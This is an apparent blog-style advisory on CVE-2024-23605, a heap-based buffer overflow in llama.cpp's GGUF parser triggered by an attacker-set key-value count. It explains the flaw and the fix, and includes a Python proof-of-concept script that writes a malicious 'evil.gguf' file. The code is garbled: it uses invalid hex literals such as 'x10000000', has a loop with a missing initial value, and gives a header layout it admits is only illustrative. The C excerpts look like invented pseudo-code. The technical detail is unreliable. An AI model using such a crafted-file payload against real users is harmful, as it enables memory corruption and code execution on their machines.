CVE-2024-23605 - Heap-Based Buffer Overflow in llama.cpp’s GGUF Library (`header.n_kv`)

Recently, researchers have disclosed CVE-2024-23605, a critical heap-based buffer overflow in the GGUF library used in llama.cpp, specifically affecting the processing of .gguf files through the header.n_kv functionality. The vulnerability was introduced in commit 18c2e17, and allows attackers to execute arbitrary code by duping the victim into loading a malicious .gguf file.

Let's walk through how the vulnerability works, its impact, and show a demonstration exploit so you can really see what's going on.

What is GGUF and Where Does the Bug Lurk?

GGUF is a binary format used to store models for large language models like LLaMA. Llama.cpp, as a fast inference tool for running these models, parses these files. In the file header, there’s a parameter called n_kv indicating the number of "key-value" pairs describing the model.

Inside the code, reading this number is simple

// code snippet from llama.cpp/gguf.c
gguf_header_t header;
fread(&header, sizeof(header), 1, fin);
uint32_t n_kv = header.n_kv;
// ... allocation for kv pairs ...
kv_pairs = malloc(n_kv * sizeof(gguf_kv_t));

But here's where things go awry. The code uses the value of n_kv directly from the file, which an attacker can set to any high value. If the file claims to have, say, xFFFFFFFF (just under 4 billion) k-v pairs, the code will attempt to allocate a MASSIVE amount of memory. On a system with limited memory, malloc might return NULL, and the check may be missing. Alternatively, the allocation might succeed, but input parsing based on this attacker-controlled value will overflow the allocated buffer — allowing writes outside its bounds.

Exploit Details: How Can Attackers Trigger This Bug?

If an attacker crafts a specially-mangled .gguf file with a dangerous n_kv value, and convinces you to run, say, llama.cpp against it (for conversion, inspection, or inference), they can:

- Overwrite memory immediately following the heap allocation, possibly corrupting program control structures or function pointers.
- Under some circumstances, achieve arbitrary code execution — letting them run malicious code on your system.

Here’s a minimal Python script to generate a malicious file

import struct

# GGUF magic and version
header = b'GGUF'
version = struct.pack('<I', 3)

# Malicious: n_kv is huge! Set to x10000000
n_kv = struct.pack('<I', x10000000)

# Padding to fill header
rest = b'\x00' * (256 - 12)  # for illustration

with open('evil.gguf', 'wb') as f:
    f.write(header + version + n_kv + rest)

When this file is consumed by LLama.cpp (up through commit 18c2e17), its GGUF parsing logic will try to allocate a huge chunk of RAM — opening the door for heap corruption and exploitation.

Proof-of-Concept Example

The real exploitation vector, in attacking terms, would take several steps: manipulating the allocation to either trick the heap into giving up adjacent control structures or using the overflow to write crafted values (like a return pointer or vtable pointer) just past the allocated buffer.

A C-slash-Python hybrid demonstration:

// Suppose this pseudo-code comes after the allocation:
for (uint32_t i = ; i < n_kv; i++)
    fread(&kv_pairs[i], sizeof(gguf_kv_t), 1, fin);

If n_kv is set so large that malloc fails and returns NULL, but this isn't checked, you end up writing into NULL — instant crash (or possible exploit if mapped). Or, if n_kv is just big enough to cause the buffer to precede valuable memory, parsing continues until the process is overwritten.

How to Fix

The maintainers patched this bug by bounding the value and checking for allocation failure right after reading n_kv, something like:

if (n_kv > MAX_REASONABLE_KV) {
    // error! suspiciously huge value
    exit(1);
}
kv_pairs = malloc(n_kv * sizeof(gguf_kv_t));
if (!kv_pairs) {
    // allocation failed, handle gracefully
    exit(1);
}

It’s basic input validation — never trust the file!

Impact and Recommendations

- This vulnerability affects llama.cpp users prior to the patch (see PR 2588).

References

- CVE-2024-23605 MITRE Entry
- Original llama.cpp Commit 18c2e17
- GGUF Format Documentation
- llama.cpp Security Patch

Conclusion

CVE-2024-23605 is a textbook example of why even "simple" input values — like the size of a data structure — must be validated when parsing user-supplied files. If you use llama.cpp, upgrade immediately, and never open ML models from unknown sources.

Stay safe, and always audit the code paths that handle outside data!

Timeline

Published on: 02/26/2024 16:27:57 UTC
Last modified on: 02/26/2024 18:15:07 UTC